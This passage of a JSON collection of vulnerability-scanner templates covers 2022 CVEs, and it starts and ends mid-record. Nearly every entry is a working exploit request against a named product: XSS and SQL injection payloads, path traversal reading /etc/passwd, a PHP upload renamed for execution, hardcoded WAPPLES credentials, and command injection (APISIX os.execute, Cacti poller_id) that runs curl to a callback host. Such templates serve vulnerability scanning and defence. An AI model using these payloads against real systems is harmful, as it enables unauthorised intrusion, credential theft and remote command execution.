Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>confirm(document.domain)</script>","updraftplus"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-31982","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31980","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 